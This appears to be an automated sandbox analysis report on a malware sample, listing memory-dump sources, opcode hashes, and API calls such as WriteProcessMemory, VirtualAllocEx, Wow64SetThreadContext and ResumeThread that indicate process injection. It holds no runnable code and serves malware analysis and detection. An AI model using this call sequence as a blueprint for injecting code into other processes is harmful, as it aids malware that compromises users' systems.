                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: be5390ce4c92963dc781659f53d7f28c2ca6583225b96c2a363413e7079d6768
                                            • Instruction ID: c2e4526df41bd32b3d83d5ce456ac9a0728cc249942a313dcb7a1d6d09ba2944
                                            • Opcode Fuzzy Hash: be5390ce4c92963dc781659f53d7f28c2ca6583225b96c2a363413e7079d6768
                                            • Instruction Fuzzy Hash: 50711070A00B058FDB24DF2AD05475ABBF2FF88705F208A6AD48A97A50DB75F945CB90

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 4b344c4-4b35a61; CreateActCtxA is called in block 4b344c4-4b359d9, followed by a self-looping tail at 4b35a61.
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 04B359C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: e0bcf81dd31ab7c8fc8028094a90c28a9cd8e2ec0d90fab01d06a1d1ec4083f6
                                            • Instruction ID: 18d29b6fdff63c11d3a78b9f0950cf2f788812c5f29441f39660ca1f4ee89598
                                            • Opcode Fuzzy Hash: e0bcf81dd31ab7c8fc8028094a90c28a9cd8e2ec0d90fab01d06a1d1ec4083f6
                                            • Instruction Fuzzy Hash: 4841F2B1C0071DDBDB24CFAAC884B9DBBB5FF48304F2080AAD408AB255DB756946CF91

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 4b3590d-4b35a61 (alternate entry into the same body as 4b344c4); CreateActCtxA is called in block 4b3590d-4b359d9, followed by a self-looping tail at 4b35a61.
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 04B359C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 9394fb8c3892dfafe3b35ad11f0199bb0c3ff99b3439fa29457e432c5b9f94b8
                                            • Instruction ID: 86480e9fa608d7f102246638afdef2a3f44b322396ee53e703d09293d4cad2a6
                                            • Opcode Fuzzy Hash: 9394fb8c3892dfafe3b35ad11f0199bb0c3ff99b3439fa29457e432c5b9f94b8
                                            • Instruction Fuzzy Hash: 5F41E5B1C00619DBDB24CFA9C984B8DBBF2FF48304F20806AD418AB255D7756946CF51

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 51cab20-51cabfe; WriteProcessMemory is called in block 51cab86-51cabc5.
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 051CABB8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 667d74a5758eba572458df42f85a4429917596abf27114a01786a73037dec18c
                                            • Instruction ID: cd664ab115da756af88fd407c229bd94c720e0ef01b6ac49932b7169f8bb3345
                                            • Opcode Fuzzy Hash: 667d74a5758eba572458df42f85a4429917596abf27114a01786a73037dec18c
                                            • Instruction Fuzzy Hash: A52155B5900309CFDB10DFA9C985BEEBBF1FF48310F10842AE919A7250C7789940CBA0

                                            Control-flow Graph

                                            control_flow_graph (rendered graph, not reproduced as text): function 51cab28-51cabfe (alternate entry into the same body as 51cab20); WriteProcessMemory is called in block 51cab86-51cabc5.
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 051CABB8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051CAC98
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051CAC98
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 051CAA0E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0

                                             Control-flow Graph (nodes marked Executed / Not Executed): basic blocks 51ca988-51ca9db, 51ca9dd-51ca9e9, 51ca9eb-51caa1b (Wow64SetThreadContext), 51caa1d-51caa23, 51caa24-51caa54
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 051CAA0E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0

                                             Control-flow Graph (nodes marked Executed / Not Executed): basic blocks 4b3d6a8-4b3d744 (DuplicateHandle), 4b3d746-4b3d74c, 4b3d74d-4b3d76a
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04B3D737
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04B3D737
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B3B099,00000800,00000000,00000000), ref: 04B3B2AA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 051CAAD6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B3B099,00000800,00000000,00000000), ref: 04B3B2AA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 051CAAD6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 051CD14D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 051CEC18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04B3B01E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 051CD14D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149451191.000000000245D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0245D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_245d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2149534438.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_246d000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: f5999c7122a2200d193d27d0e2b9f56f79d5d0794269852e6fb1652180140a2b
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 32118E75A04240DFDB16CF14D5C4B26BB61FB84214F28C6AAD8494F756C33AD44ACB62
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b12f2ee153f913db3283582d5609e26d7e3802616adfbb5c71674c44e427ff9
                                            • Instruction ID: d10f143dd50256f01cdd776bbb43d6f3696e63b77a50a5b0f1aec606d5f05890
                                            • Opcode Fuzzy Hash: 3b12f2ee153f913db3283582d5609e26d7e3802616adfbb5c71674c44e427ff9
                                            • Instruction Fuzzy Hash: 8FE1EC74E042199FCB14DFA9C5809AEFBF2FF89305F248169D414AB35AD731A981CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54d6510776d17aaefeb3ba8b6e26b91fd9eb971afc7c847a674f271407d734b9
                                            • Instruction ID: 03bf114fd474eba463b86a65035fed938302de2c5d891ce047b9bb8a72914bae
                                            • Opcode Fuzzy Hash: 54d6510776d17aaefeb3ba8b6e26b91fd9eb971afc7c847a674f271407d734b9
                                            • Instruction Fuzzy Hash: 1AE11B74E001199FCB14DFA9C5909AEFBB2FF89305F2491A9E414A735AD731AD81CFA0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65841fd2ae385ff1ab134a754a237b0df1e6db0a743d5bb4ab792435250c4183
                                            • Instruction ID: 0bffd1a5a2d68698285ee988c6984fc38ac6e4a4d3277e05e738c8903e2be24c
                                            • Opcode Fuzzy Hash: 65841fd2ae385ff1ab134a754a237b0df1e6db0a743d5bb4ab792435250c4183
                                            • Instruction Fuzzy Hash: 48E12B74E001198FCB15DFA8C5809AEFBB2FF89305F2481A9E415A735AD731AD81CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 219b451729e8e6b10afd5a80202bb2b30583aab2d7714daef99d3fb3a4ba0ac5
                                            • Instruction ID: c8b8b4c30081e68c6e5cb55cf9e3f4ee9316089c08675719d117c7fed974fc1e
                                            • Opcode Fuzzy Hash: 219b451729e8e6b10afd5a80202bb2b30583aab2d7714daef99d3fb3a4ba0ac5
                                            • Instruction Fuzzy Hash: 84E10A74E041199FCB14DFA9C5809AEFBF2FF89305F2481A9E414A735AD731A981CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d3d306059cf591b1ef841b71d6c2d5571e19b532663e1c0e91739388ddb16b0
                                            • Instruction ID: 98f253375ade86dcb90842e7dd565396884f2ba10101d22103e009018744c7f6
                                            • Opcode Fuzzy Hash: 8d3d306059cf591b1ef841b71d6c2d5571e19b532663e1c0e91739388ddb16b0
                                            • Instruction Fuzzy Hash: 42E1FA74E001198FCB14DFA9C5809AEFBB2FF89305F248169E415AB35AD731AD81CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc02aa847c681a0710b871fe46eb891c1c106216a23945d3b9d4134a97ef221f
                                            • Instruction ID: 6b88c8c4d86225f9a2280fb81c739d7a2a2a81fe6d22d55aeed18394d8dd8cf5
                                            • Opcode Fuzzy Hash: cc02aa847c681a0710b871fe46eb891c1c106216a23945d3b9d4134a97ef221f
                                            • Instruction Fuzzy Hash: D6D10431D1076A8ADB11EF64DA50A9DB7B1EF95300F11D79AD10937224FBB0AAC9CF81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cef03c56d700646715e1e44458c60db9397c4377cc0585736669fab01ec35473
                                            • Instruction ID: 2dcbdcccc86091afd1bc3151683bbe46ad94bf8994ec9dcd94d6a43b8a30e8c3
                                            • Opcode Fuzzy Hash: cef03c56d700646715e1e44458c60db9397c4377cc0585736669fab01ec35473
                                            • Instruction Fuzzy Hash: 1CD1F431D1066A8ADB11EFA4D950A9DB7B1FF95300F11D79AD10937214FBB0AAC9CF81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bb3a9ad4a61718347b64c72032168de806b7d446f121fed3d68306f6c8017c9
                                            • Instruction ID: f644ab24b55a06f01a854b69b4fafaaa5f0b58c5e6f54c77dfc82711122dbd8c
                                            • Opcode Fuzzy Hash: 9bb3a9ad4a61718347b64c72032168de806b7d446f121fed3d68306f6c8017c9
                                            • Instruction Fuzzy Hash: A9A19036E00209CFCF05DFB6D9409AEB7B2FF85305B1585AAE801AB265DB75ED15CB40
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97c52a57c763548897e6d4aebadf7d1e63aec7fa4aead3d390b196609bf93833
                                            • Instruction ID: 29f8b2122100bf793ed3ea26e580db59b70c13dd0ee65f316818343142a99313
                                            • Opcode Fuzzy Hash: 97c52a57c763548897e6d4aebadf7d1e63aec7fa4aead3d390b196609bf93833
                                            • Instruction Fuzzy Hash: 7D615E74E042198FDB15CF69C5845AEFBF2BF8A310F1481AAD408AB316D731A981CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 935f64e881775da9097befcbabb2437d4eb0a3ba926a93f193e5135fe43aa967
                                            • Instruction ID: b815f1e319bdb052116a19d2503fb167d0d5fe20c571b836daa323d3164d277a
                                            • Opcode Fuzzy Hash: 935f64e881775da9097befcbabb2437d4eb0a3ba926a93f193e5135fe43aa967
                                            • Instruction Fuzzy Hash: 2E512D74E042199FDB14DF69C5805AEFBF2BF89305F24C1A9D408AB356D7319941CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e177a23f1e2cc22ecdfaf0545133ca085b4bdf25174355f1230f4ed20b563a5e
                                            • Instruction ID: 75626ac530d54b0e2fdf39710e4b40ad7e2164c235ecf1e62fcabc4a009bf219
                                            • Opcode Fuzzy Hash: e177a23f1e2cc22ecdfaf0545133ca085b4bdf25174355f1230f4ed20b563a5e
                                            • Instruction Fuzzy Hash: C2511C74E042199FDB14DFA9C5845AEFBF2BF89301F24C1A9D418A7316D7319942CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6cdd137065f44c9e9f3d14eaba1c447df9ecae09cb34537c24e2054ca89feb5
                                            • Instruction ID: 4b8772a84524fbca50af673a35794446f6d4d9b148ceebc5ede49a2e9d244411
                                            • Opcode Fuzzy Hash: b6cdd137065f44c9e9f3d14eaba1c447df9ecae09cb34537c24e2054ca89feb5
                                            • Instruction Fuzzy Hash: 77513A74E042198FCB15CFA9C5805AEFBF2BF89305F24C1A9D419AB316D7319A81CFA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf0675bbfb53011af6cf4143d5f75d3c7548d96fb511322fcaeab576968f142e
                                            • Instruction ID: d54e3532a3a199e23a23efa859234e57fd62777c7c97385b0706b42893ca1bec
                                            • Opcode Fuzzy Hash: bf0675bbfb53011af6cf4143d5f75d3c7548d96fb511322fcaeab576968f142e
                                            • Instruction Fuzzy Hash: 52512774E042198FCB14CFA9C5805AEFBF2FF89305F2481A9D418A7356D731A982CFA0

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:2.8%
                                            Signature Coverage:5.7%
                                            Total number of Nodes:574
                                            Total number of Limit Nodes:67
                                            execution_graph: serialized node/edge data of the report's interactive execution graph (root node 41f0f0; each node is a function address, each edge a call). API calls annotated on graph nodes: LdrLoadDll, LdrInitializeThunk, NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory, RtlAllocateHeap, RtlFreeHeap, LookupPrivilegeValueW, PostThreadMessageW, ExitProcess. The Nt*, Rtl* and ExitProcess call sites sit behind LdrLoadDll nodes (resolver stub at 41af60), while the LdrInitializeThunk nodes at 12d2ad0..12d2fb0 lie outside the 405f60..41d060 range of the sample's own code.

                                            Control-flow Graph (basic blocks: id address-range calls; edges: id->id)
                                            • 0 41a410-41a459 call 41af60 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                            Control-flow Graph (basic blocks: id address-range calls; edges: id->id)
                                            • 224 40acf0-40ad19 call 41cc50 227 40ad1b-40ad1e 224->227 228 40ad1f-40ad2d call 41d070 224->228 231 40ad3d-40ad4e call 41b4a0 228->231 232 40ad2f-40ad3a call 41d2f0 228->232 238 40ad50-40ad64 LdrLoadDll 231->238 239 40ad67-40ad6a 231->239 232->231 238->239
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

                                            Control-flow Graph (basic blocks: id address-range calls; edges: id->id)
                                            • 240 41a35a-41a35d 241 41a38c-41a3b1 NtCreateFile 240->241 242 41a35f 240->242 243 41a361-41a389 call 41af60 242->243 244 41a3b6-41a3bb 242->244 243->241
                                            APIs
